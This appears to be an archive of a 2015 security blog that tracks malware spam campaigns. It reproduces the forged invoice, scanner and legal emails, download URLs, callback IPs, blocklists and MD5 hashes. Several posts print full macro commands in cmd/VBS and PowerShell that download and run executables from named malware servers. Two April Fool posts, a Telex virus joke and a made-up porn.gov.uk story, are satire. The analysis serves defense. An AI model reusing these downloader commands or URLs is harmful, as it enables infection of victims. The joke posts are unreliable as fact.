Sponsored by..

Wednesday, 8 April 2015

Malware spam: "TWO UNPAID INVOICES" / "Wayne Moore [wayne44118@orionplastics.net]"

This fake invoice spam is not from Orion Plastics but is instead a simple forgery with a malicious attachment.

From:    Wayne Moore [wayne44118@orionplastics.net]
Date:    8 April 2015 at 09:03
Subject:    TWO UNPAID INVOICES

4/3----- LAST WEEK I CALLED REGARDS TWO UNPAID INVOICES FROM JAN 2015
INVOICE # 029911  DATED 1/7/15 FOR $840.80
INVOICE # 030042  DATED 1/30/15 FOR $937.00

PLEASE ADVISE WHEN  YOU SENT CHECK AND TO WHAT ADDRESS

I HAVE ATTACHED THE NEW REMIT TO ADDRESS IN CASE YOU DON’T HAVE IT

REGARDS-WAYNE
In this case the email was malformed and the attachment REMITTANCE & WIRE TRANSFER ADDRESS.DOC wasn't downloadable (this may be a temporary problem). The document has a detection rate of just 1/56. Extracting the document revealed this malicious macro [pastebin] which downloads an additional component from:

http://fzsv.de/11/004.exe

There are usually other download locations in different variants of the document, but the downloaded executable will be the same. The executable is saved as %TEMP%\c48.exe. This malicious binary has a detection rate of 6/54. Automated analysis tools [1] [2] [3] shows it phoning home to the following IPs:

37.140.199.100 (Reg.Ru Hosting, Russia)
176.67.160.187 (UK2, UK)
81.148.134.130 (BT, UK)
46.228.193.201 (Aqua Networks Ltd, Germany)
83.136.80.46 (myLoc, Germany)

The Malwr report shows it attempting to connect to a couple a Akamai IPs that I suspect are NOT malicious and would cause collateral damage if blocked:

90.84.136.185
184.25.56.220

According to the same Malwr report it drops a Dridex DLL with a detection rate of 4/57.

Recommended blocklist:
37.140.199.100
176.67.160.187
81.148.134.130
46.228.193.201
83.136.80.46

MD5s:
3e3a09644170ad3184facb4cace14f8a
671c65cedc8642adf70ada3f74d5da19
14c2795bcc35c3180649494ec2bc7877

Tuesday, 7 April 2015

Malware spam: "COMPANY NAME has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]"

This fake legal spam comes with a malicious attachment:

From:    Isiah Mosley [Rosella.e6@customer.7starnet.com]
Date:    7 April 2015 at 14:09
Subject:    Schroders has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]

Schroders,Isiah Mosley

The company name is randomly chose. In the above example the attachment was called VM1993LVW.doc which matched the reference in the subject. The Word document contains a malicious macro [pastebin] which executes the following command:
cmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://185.39.149.178/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo    .type = 1 >>gyuFYFGuig.vbs & @echo     .open>>gyuFYFGuig.vbs & @echo     .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo     .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbs
I can't be bothered to work out all of the crap with the .vbs which may of may not be importance. Along with an alternate macro, I can see download locations from:

http://185.39.149.178/aszxmy/image04.gif
http://148.251.87.253/aszxmy/image04.gif

For the record,  185.39.149.178 is OOO A.S.R. in Russia and 148.251.87.253 is Hetzner in Germany.

The downloaded .GIF file is definitely not a GIF and is instead an executable that gets saved as %TEMP%\dfsdfff.exe. This has a VirusTotal detecton rate of 2/56. Automated analysis tools [1] [2] [3] show the malware phoning home to:

151.252.48.36 (Vautron Serverhousing, Germany)

According to the Malwr report, it drops a DLL with a detection rate of 2/56 which is most likely a Dridex DLL.

Recommended blocklist:
151.252.48.36
148.251.87.253
185.39.149.178

MD5s:
a4e14c88da9e1a74cd7c26ded99b6a0a
c86a9d012e372d0c3a82b14978ffa1f0

Malware spam: "Order Confirmation Order BNTO056063 06/04/2015" / "Sales-BNThermic [Sales@bnthermic.co.uk]"

This fake financial spam does not come from BN Thermic but is instead a simple forgery with a malicious attachment:

From:    Sales-BNThermic [Sales@bnthermic.co.uk]
Date:    7 April 2015 at 09:48
Subject:    Order Confirmation Order BNTO056063 06/04/2015

Thank you for your order, please find attached confirmation.

Best Regards


BN Thermic

In all cases, the attached file is called BNTO056063.DOC, but there are actually at least four different variants with one of four malicious macros [1] [2] [3] [4] which then download a component from one of the following locations:

http://heubett.de/220/68.exe
http://fzsv.de/220/68.exe
http://deosiibude.de/deosiibude.de/220/68.exe
http://bewakom.de/220/68.exe


This file is then saved as %TEMP%\wabat1.1a.exe. This executable is the same one as used in this attack and the payload is the Dridex banking trojan.

Malware spam: "EBOLA INFORMATION" / "noreply@ggc-ooh.net"

This fake medical email contains a malicious attachment. It's a novel approach by the bad guys, but I doubt that many people will find it believable enough to click.

From:    noreply@ggc-ooh.net
Reply-To:    noreply@ggc-ooh.net
Date:    7 April 2015 at 08:58
Subject:    EBOLA INFORMATION

This email is generated from an unmanned mailbox. Dr N J Gaw can be contacted via noreply@ggc-ooh.net

PLEASE SEE THE ATTACHED CORRESPONDENCE FOR YOUR INFORMATION.

THANK YOU.
Attached is a file 30.03.15 Ebola Virus (2).doc which contains this malicious macro [pastebin] which is contains a lot of girls names as variables (which makes a nice change from the randomly-generated stuff I suppose).

When decoded the macro downloads a component from:

http://deosiibude.de/deosiibude.de/220/68.exe

VirusTotal submissions seem to be down at the moment, so I can't tell you what the detection rate is. Automated analysis tools [1] [2] [3] show it phoning home to the following IPs (ones in bold are most likely static, the others look to be dynamic):

37.140.199.100 (Reg.Ru Hosting, Russia)
46.228.193.201 (Aqua Networks Ltd, Germany)
130.241.92.141 (Goteborgs Universitet, Sweden)
46.101.49.125 (Digital Ocean Inc, UK)
122.167.6.68 (ABTS, India)
5.100.249.215 (O.M.C. Computers & Communications Ltd, Israel)

85.255.173.109 (Satnet Ltd, Bulgaria)
217.37.39.235 (BT Broadband, UK)
81.190.50.232 (Multimedia Polska S. A., Poland)
89.228.15.18 (Multimedia Polska S. A., Poland)

According to the Malwr report it drops a whole load of files including what is probably a Dridex DLL.

Recommended blocklist:
37.140.199.100
46.228.193.201
130.241.92.141
46.101.49.125
122.167.6.68
85.255.173.109
5.100.249.215
217.37.39.235
81.190.50.232
46.228.193.201
89.228.15.18


MD5s:
E4CC002A95CAAF4481CB7140BBE96C58
C86A9D012E372D0C3A82B14978FFA1F0
F98A674A5FA473AC9BF738636FF6374E



Thursday, 2 April 2015

Malware spam: "Copy invoices Snap on Tools Ltd" / "Allen, Claire [Claire.Allen@snapon.com]"

This fake invoice does not come from Snap On Tools, but is instead a simple forgery.

From:    Allen, Claire [Claire.Allen@snapon.com]
Date:    24 February 2015 at 14:41
Subject:    Copy invoices Snap on Tools Ltd

Good Afternoon

Attached are the copy invoices that you requested.

Regards

Claire

Your message is ready to be sent with the following file or link attachments:

SKETTDCCSMF14122514571


Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments.  Check your e-mail security settings to determine how attachments are handled.
I have only seen one copy of this with an attachment SKETTDCCSMF14122514571.doc which contains this malicious macro [pastebin], which downloads a further component from:

http://ws6btg41m.homepage.t-online.de/025/42.exe

This executable has a detection rate of 5/57. Various automated analyses [1] [2] [3] [4] show attempted communications to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
72.167.62.27 (GoDaddy, US)
62.113.219.35 (23Media GmbH, Germany)
46.101.49.125 (Digital Ocean, UK)
130.241.92.141 (Goteborgs Universitet, Sweden)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc., US)
94.23.173.233 (OVH, Czech Republic)
14.98.243.243 (Tata Indicom, India)
5.100.249.215 (O.M.C. Computers & Communications, Israel)
62.113.223.227 (23Media GmbH, Germany)

According to this Malwr report  it drops another version of the downloader called edg1.exe [VT 4/57] and a malicious Dridex DLL [VT 2/57].

Recommended blocklist:
91.242.163.70
72.167.62.27
62.113.219.35
46.101.49.125
130.241.92.141
198.245.70.182
94.23.173.233
14.98.243.243
5.100.249.215
62.113.223.227

MD5s:
dc92858693f62add2eb4696abce11d62
6fb2f86986e074cf44bd4c9f68e9822e
9565b17a4f1221fee473d0d8660dc26d
62e780a6237c6f9fd0a8e16a2823562d





Malware spam: "Scanned document from HP/Brother/Epson Scanner [87654321]"

These fake scanner emails follow a well-established pattern. Instead of containing a scanned document they have a malicious attachment.

Now.. if you are reading this then you are probably not the sort of person who would open an unsolicited message of this sort. Would you?

From:    Cindy Pate [Caroline.dfd@flexmail.eu]
Date:    2 April 2015 at 11:09
Subject:    Scanned document from HP Scanner [66684798]

Reply to: HP-Scanner@flexmail.eu
Model:KX-240NGZDC
Location: 1st Floor Office

File Format: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

----------

From:    Sterling Hoffman [Lara.dc4@astroexports.com]
Date:    2 April 2015 at 11:00
Subject:    Scanned document from Brother Scanner [07623989]

Reply to: Brother-Scanner@astroexports.com
Model:CG-240NWDUL
Location: 1st Floor Office

File Extension: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

----------

From:    Manuel Velez [Yesenia.10@acv.nl]
Date:    2 April 2015 at 12:04
Subject:    Scanned document from Epson Scanner [81829722]

Reply to: Epson-Scanner@acv.nl
Model:JS-240NRZYV
Location: 1st Floor Office

File Format: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

I have seen three different malicious attachments with low detection rates [1] [2] [3] which appear to contain one of two macros [1] [2] which download a further component from one of the following locations:

http://93.158.117.163:8080/bz1gs9/kansp.jpg
http://78.47.87.131:8080/bz1gs9/kansp.jpg


Those servers are almost definitely malicious in other ways, the IPs are allocated to:

93.158.117.163 (Aitos Svenska / Port80 , Sweden)
78.47.87.131 (Hetzner, Germany)

This is then saved as %TEMP%\sdfsdffff.exe which has a VirusTotal detection rate of just 1/56. Automated analysis [1] [2] [3] indicates that it calls home to:

188.120.225.17 (TheFirst-RU, Russia)
92.63.88.83 (MWTV, Latvia)
121.50.43.175 (Tsukaeru.net, Japan)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
82.151.131.129 (Doruknet, Turkey)
46.19.143.151 (Private Layer Inc, Switzerland)
45.55.154.235 (Digital Ocean, US)
195.130.118.92 (University Of Ioannina, Greece)
199.201.121.169 (Synaptica, Canada)
95.211.168.10 (Leaseweb, Netherlands)
222.234.230.239 (Hanaro Telecom, Korea)

Although the automated tools indicate that no files were dropped, the payload for this is almost definitely Dridex.

Recommended blocklist:
188.120.225.17
92.63.88.0/24
121.50.43.175
95.163.121.0/24
82.151.131.129
46.19.143.151
45.55.154.235
195.130.118.92
199.201.121.169
95.211.168.10
222.234.230.239
93.158.117.163
78.47.87.131

MD5s:
96f3aa2402daf9093ef0b47943361231
cff4b8b7f9adf1f5964b495a8116d196
68fb9aadda63d18f1b085d5bd8815223
64fa6501bd4d32b2958922598008ca96


Malware spam: "Sage Invoice [invoice@sage.com]" / "Outdated Invoice"

This fake financial email is not from Sage but is a simple forgery that leads to malware.

From:    Sage Invoice [invoice@sage.com]
Date:    2 April 2015 at 12:24
Subject:    Outdated Invoice

Sage Logo



 Sage Account & Payroll

You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:


If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.

The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies.

We have communicated this information with users as well, and we will continue to communicate with you through email as your transition continues.

This email was sent to: [redacted]

This email was sent by: Sage UK Limited
NC1-002-08-25,
Newcastle upon Tyne., North Park, NE13 9AA, United Kingdom

Privacy and Security
Keeping your financial information secure is one of our most important responsibilities. For an explanation of how we manage customer information, please read our Privacy Policy. You can also learn how Sage UK Limited keeps your personal information secure and how you can help protect yourself.

The link in the email does not in face go to Sage, but it downloads a file from hightail.com. The payload is identical to the one used in this concurrent spam run.

Malware spam: "invoice@bankline.ulsterbank.ie" / "Outstanding invoice"

This fake banking email leads to malware.

From:    invoice@bankline.ulsterbank.ie [invoice@bankline.ulsterbank.ie]
Date:    2 April 2015 at 11:46
Subject:    Outstanding invoice

Dear [victim],


Please find the attached copy invoice which is showing as unpaid on our ledger.

To download your invoice please click here

I would be grateful if you could look into this matter and advise on an expected payment date .

Courtney Mason

Credit Control

Tel: 0845 300 2952 

The link in the email leads to a download location at hightail.com (the sample I saw downloaded from https://www.hightail.com/download/e?phi_action=app/directDownload&fl=SWhZekZucVhVbTlFQlFJWjA4bnVnVE9yZWt5UmdteDRsUjJuWENHRzVZbz0) which is a file called Doc_0062119-LQ.zip which in turn contains the malicious executable Doc_0062119-LQ.scr.

The executable has a VirusTotal detection rate of 3/57 and has characteristics that identify it as Upatre. Automated analysis tools [1] [2] [3] [4] [5] show that it downloads additional components from:

eduardohaiek.com/images/wicon1.png
edrzambrano.com.ve/images/wicon1.png

 It also POSTs data to 141.105.141.87 (Makiyivka Online Technologies Ltd, Ukraine) in a characteristic Upatre manner:

http://141.105.141.87:13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK

According to the Malwr report, the downloader drops a file gkkjxyz22.exe which has a detection rate of 2/57. This is probably the Dyre banking trojan.

Recommended blocklist:
141.105.140.0/22
 eduardohaiek.com
edrzambrano.com

MD5s:
4c666564c1db6312b9f05b940c46fa9a
876900768e06c3df75714d471c192cc6

Wednesday, 1 April 2015

Malware spam: "Your Remittance Advice COMPANY NAME"

Yet another malware spam run today, this time from randomly-named but legitimate companies, for example:

From:    Kate Coffey
Date:    1 April 2015 at 15:00
Subject:    Your Remittance Advice PEEL SOUTH EAST

Dear sir or Madam,

Please find attached a remittance advice (JT934IYIP.doc) for your information.
Should you need any further information, please do not hesitate to contact us.

Best regards
PEEL SOUTH EAST

Attached is a Word document with a filename matching the body one in the text. Every email attachment we have seen so far is slightly different, but there seem to be just two different malicious macros [1] [2] [pastebin] which download a component from one of the following locations:

http://31.41.45.175/sqwere/casma.gif
http://91.242.163.78/sqwere/casma.gif


Those servers are almost certainly entirely malicious, with IPs assigned to:

31.41.45.175 (Relink Ltd, Russia)
91.242.163.78 (Sysmedia, Russia)

This file is saved as %TEMP%\DOWUIAAFQTA.exe and has a VirusTotal detection rate of 4/49. Automated analysis tools [1] [2] [3] show attempted connections to:

188.120.225.17 (TheFirst-RU, Russia)
45.55.154.235 (Digital Ocean, US)
188.126.72.179 (Portlane AB, Sweden)
1.164.114.195 (Data Communication Business Group, Taiwan)
46.19.143.151 (Private Layer Inc, Switzerland)
79.149.162.117 (Telefonica Moviles Espana, Spain)
5.135.28.104 (OVH / Simpace.com, UK)

According to this Malwr report it downloads the same Dridex DLL as seen in this spam run plus another variant of the downloader with a detection rate of 3/56.

Recommended blocklist:
188.120.225.17
45.55.154.235
188.126.72.179
1.164.114.195
46.19.143.151
79.149.162.117
5.135.28.104/29
31.41.45.175
91.242.163.78

MD5s:
b4be0bb41af791004ae3502c5531773b
7bede7cc84388fb7bfa2895dba183a20
564597fd05a31456350bac5e6c075fc9

Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment

This rather terse spam has no body text and comes from random senders. It has a ZIP attachment which contains a malicious script.

Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]

Example senders:
SAROSSA PLC
32RED
NOIDA TOLL BRIDGE CO

Example attachment names:
RC422QNSB.zip
ML82034PMRY.zip
MK843NCAK.zip
OI8244LPNH.zip
ZW1760EHOG.zip
MANX FINANCIAL GROUP PLC
RARE EARTH MINERALS PLC

Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.

When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;
Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.

This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to:

188.120.225.17 (TheFirst-RU, Russia)
121.50.43.175 (Tsukaeru.net, Japan)
82.151.131.129 (DorukNet, Turkey)
92.63.88.83 (MWTV, Latvia)
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
199.201.121.169 (Synaptica, Canada)
188.226.129.49 (Digital Ocean, Netherlands)
192.64.11.232 (Synaptica, Canada)
77.74.103.150 (iway AG GS, Switzerland)
1.164.114.195 (Data Communication Business Group, Taiwan)
5.135.28.104 (OVH / Simpace.com, UK)
46.19.143.151 (Private Layer Inc, Switzerland)

It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.

Recommended blocklist:
188.120.225.17
121.50.43.175
82.151.131.129
92.63.88.0/24
95.163.121.0/24
199.201.121.169
188.226.129.49
192.64.11.232
77.74.103.150
1.164.114.195
5.135.28.104/29
46.19.143.151

Malware spam: "Batchuser BATCHUSER [ecommsupport@cihgroup.com]" / "CIH Delivery Note 0051037484"

The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment.

From:    Batchuser BATCHUSER [ecommsupport@cihgroup.com]
Date:    31 March 2015 at 09:15
Subject:    CIH Delivery Note 0051037484

**********************************************************************
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD

**********************************************************************
Apart from the disclaimer there is no body text. If you do as the disclaimer says and run attached Word document (CIH Delivery Note 0051037484.doc) through an anti-virus product then it will appear to clean, but it actually contains this malicious macro [pastebin] which downloads a component from:

http://www.tschoetz.de/122/091.exe

This is saved as %TEMP%\stoiki86.exe. There are usually two or three different download locations, but they will all lead to the the same binary which in this case has a detection rate of 5/56.

Various automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
37.139.47.81 (Comfortel Ltd / Pirix, Russia)
72.167.62.27 (GoDaddy, US)
212.227.89.182 (1&1, Germany)
46.228.193.201 (Aqua Networks Ltd, Germany)
46.101.49.125 (Digital Ocean Inc, Netherlands)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc, US)
95.211.184.249 (Leaseweb, Netherlands)

According to this Malwr report it also drops another version of the downloader [VT 4/57] and a malicious DLL which will almost definitely be Dridex [VT 2/57].

Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249

Malware spam: "Australia Post" / "Track Advice Notification: Consignment RYR58947332

This fake Australia Post email leads to malware hosted on Cubby.
From:    Australia Post [noreply@auspost.com.au]
Date:    31 March 2015 at 23:25
Subject:    Track Advice Notification: Consignment RYR5894733

Your parcel (1) has been dispatched with Australia Post.

The courier company was not able to deliver your parcel by your address.

Label is enclosed to the letter. Print a label and show it at your post office.

Label: RYR5894733

To view/download your label please click here or follow the link below :

https://eparceltrack.auspost.com.au/external/webui/aspx?LabelCode=label_5894733


**Please note that this is an automatically generated email - replies will not be answered. 
I have only seen one sample of this and the Cubby download page was showing quota exceed. However, the payload will be identical to the one found in this other Australian-themed spam running concurrently.

Malware spam: "Australian Taxation Office - Refund Notification"

This fake tax notification spam leads to malware hosted on Cubby.

From:    Australian Taxation Office [noreply@ato.gov.au]
Date:    1 April 2015 at 00:51
Subject:    Australian Taxation Office - Refund Notification

IMPORTANT NOTIFICATION

Australian Taxation Office - 31/03/2015

After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2307.15 AUD.

To view/download your tax notification please click here or follow the link below :
https://www.ato.gov.au/AZItems.aspx?id=3673&category=Tax+legislation+and+regulations&sorttype=azindexdisplay&Disp=True?NotificationCode=notification_0354003

Laurence Thayer, Tax Refund Department Australian Taxation Office
The names and the numbers change from email to email. Despite the displayed URL in the message, the link actually goes to cubbyusercontent.com (e.g. https://www.cubbyusercontent.com/pl/RYR5601763.zip/_33cdead4ebfe45179a32ee175b49c399) but these download locations don't last very long as there is a quota on each download.

In this case, the downloaded file is RYR5601763.zip which contains a malicious executable RYR5601763.scr which has a VirusTotal detection rate of 20/57.

Automated analysis tools [1] [2] [3] [4] [5] show that it downloads components from:

ebuyswap.co.uk/mandoc/muz3.rtf
eastmountinc.com/mandoc/muz3.rtf


It then attempts to phone home to:

141.105.141.87:13819/3103us13/HOME/41/7/4/

That IP is allocated to Makiyivka Online Technologies Ltd in Ukraine. In addition, it looks up the IP address of the computer at checkip.dyndns.org. Although this is benign, monitoring for it can be a good indicator of infection.

These URL requests are typical of the Upatre downloader.

According to the Malwr report  it drops another binary jydemnr66.exe with a detection rate of 11/55 plus a benign PDF file entitled "War by remote control" which acts as some sort of cover for the infection process.

Recommended blocklist:
141.105.140.0/22
ebuyswap.co.uk
eastmountinc.com 



"You've received a Telex" spam

Well, I guess if people are daft enough to think that somebody has emailed them a fax or voicemail message then this is the next logical step.
From: Telex Operator [telex@victimdomain]
To: victim@victimdomain
Subject: You have received a Telex!
Date: 1st April 2015

You have received a Telex transmission. Please be so kind as to open the attachment.
Attached is a file telex.zip which in turn contains a presumably malicious file telex.txt neither of which are detected by VirusTotal [1] [2] and the Malwr report is inconclusive.

Foolishly, one of our users opened the attachment and saw the following text strings:
00110 01101 00100 10101 11000 00111 00100 10000 10100 00110 01100 01111 00100 10000 10100 00011 10000 00100 00101 11000 11100 00001 11000 01100 00001 00100 10100 00011 00101 00100 00001 11100 00011 00110 10010 00001 01001 00100 10101 11000 00111 00100 00011 00100 01101 00011 11101 11011 01100 00100 11111 11110 11000 00110 01110 00001 11100 00011 00110 10010 00100 11000 01010 00100 10000 00001 10010 00001 11101 00100 10000 10100 00001 01100 00100 10101 11000 00111 00100 00011 01010 00001 00100 00011 00100 01101 11000 11000 10010 11011 11100 00100 11111 10100 00011 10110 10110 10101 00100 00011 10110 01010 00110 10010 00100 01101 11000 11000 10010 11011 00101 11111 00101 00100 01001 00011 10101 11011 11100
As soon as the user opened it, our own Telex machine started printing out little skull-and-crossbones characters. Now, I thought this was odd because I didn't think that the Telex machine actually had that character on.. and when I took out the daisywheel and looked closely then I couldn't find it (see image below).

Weird, huh? So, I don't know if this is a weird cross-platform cyber virus or some sort of digital incantation? I don't have much time to look now though because apparently somebody has emailed me a telegram.

(Yes, it is April Fool's day. Nobody tried to decrypt the message though!)



UK government to regulate online smut, launches PORN.GOV.UK

The government's War on Porn continues to gain pace, with an announcement today that they will make porn filtering mandatory (effectively banning pornography for consumers) and replace it with the government-controlled website PORN.GOV.UK (which is not yet operational).

Very closely modelled on the existing gov.uk site, porn.gov.uk will be available to people who sign up for a Government Gateway account.

At the end of the year, each subscriber will receive a statement of which pornography they viewed, and the costs for this will be added to their annual tax bill, either through PAYE or Self-Assessment.

The government did release a preview of the site (see the image below) which is refreshingly free of filth on the home page.

Visitors can either use the search box to find what they are after, or they can browse for approved pornographic material by category.

It's worth remembering that all material must meet the new British Standards for Pornography set up by the BSI as BS 6969. The BSI will shortly start advertising for Pornography Analysts on their careers page.

Although many sources may object to the perceived censorship, it is surely common sense that wholesome state-approved pornography will be better for everyone. Government sources say that the legislation should be passed before the election with an expected go-live date of 1st April 2016. 

Tuesday, 31 March 2015

Malware spam: "Debit Note [12345] information attached to this email"

This fake financial spam comes with a malicious attachment. There is no body text:
From:    Scot Dennis
Date:    31 March 2015 at 14:32
Subject:    Debit Note [09993] information attached to this email
The number in the brackets varies, and the attachment seems to be randomly named (for example. 42549959.doc). There are probably many, many variants of this but the sample I saw had this malicious macro [pastebin] that executed the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
The executable downloaded is identical to the one used in this spam run also taking place today. The payload is the Dridex banking trojan.




Malware spam: "83433-Your Latest Documents from RS Components 659751716"

This very convincing looking email pretending to be from RS has a malicious attachment. Although the email looks genuine, it is a simple forgery. RS are not sending out this email, nor have their systems been compromised in any way.

---------------------------------------------------------------

From:    Earlene Carlson
Date:    31 March 2015 at 11:30
Subject:    83433-Your Latest Documents from RS Components 659751716

RS Online Helping you get your job done.
You've received this email as a customer of rswww.com.


Dear Customer,


Please find attached your latest document(s) from RS.


Account Number
Date
Invoice Number
Document Total
Document Type
49487999
31-Mar-2015
659751716
£1133.90  
Invoice



For all account queries please contact RS Customer Account Services.

Tel: 01536 752867
Fax: 01536 542205
Email: rpdf.billing@colt.net (subject box to read DOC eBilling)


If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:

Tel: 0333 8727520
Email: customers@colt.net


Kind regards,

RS Customer Account Services.


This service is provided by Swiss Post Solutions on behalf of RS Components.
Helping you get
your job done


RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK.
Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.

---------------------------------------------------------------

The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).

There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.

Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.

UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:

188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)

It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.

Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169

Malware spam: "Circor [DONOTREPLY_JDE@circor.com]" / "CIT Inv# 15013919 for PO# SP14384"

This fake invoice does not come from Circor, it a simple forgery and is largely a repeat of a spam circulating last month.

From:    Circor [DONOTREPLY_JDE@circor.com]
Date:    31 March 2015 at 10:32
Subject:    CIT Inv# 15013919 for PO# SP14384


Please do not respond to this email address.  For questions/inquires, please
contact our Accounts Receivable Department.


______________________________________________________________________
This email has been scanned by the MessageLabs outbound
Email Security System for CIRCOR International Inc.
For more information please visit http://www.symanteccloud.com
______________________________________________________________________

In the sample I have seen, there is an attachment FOPRT01.doc which has a VirusTotal detection rate of 5/57. It downloads a binary from:

http://www.malpertus.com/54/78.exe

This binary is the same as used in this attack and it has the same payload.

Malware spam: "FW: Passport copy" / "salim@humdsolicitors.co.uk"

This fake legal spam comes with a malicious attachment. It appears to be a forwarded message from a solicitors office, but it is just a simple forgery.
From:    salim@humdsolicitors.co.uk
Date:    30 March 2015 at 11:58
Subject:    FW: Passport copy

From: Raad Ali [mailto:raaduk@hotmail.com]
Sent: 26 March 2015 08:03
To: salim
Subject: Passport copy

Salam Salim,

Please find attached copy of the passport for my wife and daughter as requested. please note we need to complete on the purchase in 4 weeks from the agreed date.

  Salam

Raad Ali
The attachment is named passport.doc. It is exactly the same malicious payload as the one used in this spam run earlier today, and it drops the Dridex banking trojan on the victim's PC.

